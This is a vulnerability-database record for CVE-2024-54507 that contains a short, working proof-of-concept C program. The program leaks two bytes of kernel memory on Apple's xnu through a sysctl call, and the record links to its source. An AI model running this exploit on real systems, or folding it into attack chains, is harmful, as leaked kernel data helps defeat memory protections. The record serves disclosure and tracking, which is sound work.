{"uuid": "25c99b1c-5ba6-4c88-bac6-3ad6c5e525b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "title": "Proof Of Concept", "description": "```c\n// ravi (@0xjprx)\n// 2-byte kernel infoleak, introduced in xnu-11215.1.10.\n// gcc SUSCTL.c -o susctl\n// ./susctl\n#include <stdio.h>\n#include <sys/sysctl.h>\n\nvoid leak() {\n    uint64_t val = 0;\n    size_t len = sizeof(val);\n    sysctlbyname(\"net.inet.udp.log.remote_port_excluded\", &val, &len, NULL, 0);\n    printf(\"leaked: 0x%llX 0x%llX\\n\", (val >> 16) & 0x0FF, (val >> 24) & 0x0FF);\n}\n\nint main() {\n    leak();\n    return 0;\n}\n```\n\nfrom https://github.com/jprx/CVE-2024-54507", "description_format": "markdown", "vulnerability": "CVE-2024-54507", "creation_timestamp": "2025-01-24T06:21:59.299861+00:00", "timestamp": "2025-01-24T06:32:36.489951+00:00", "related_vulnerabilities": ["CVE-2024-54507"], "meta": [{"ref": ["https://github.com/jprx/CVE-2024-54507", "https://jprx.io/cve-2024-54507/"], "tags": ["vulnerability:exploitability=documented", "vulnerability:information=PoC"]}], "author": {"login": "sync_user", "name": "sync_user", "uuid": "4f29edb9-4c4b-44ca-b041-9b050656b6ae"}}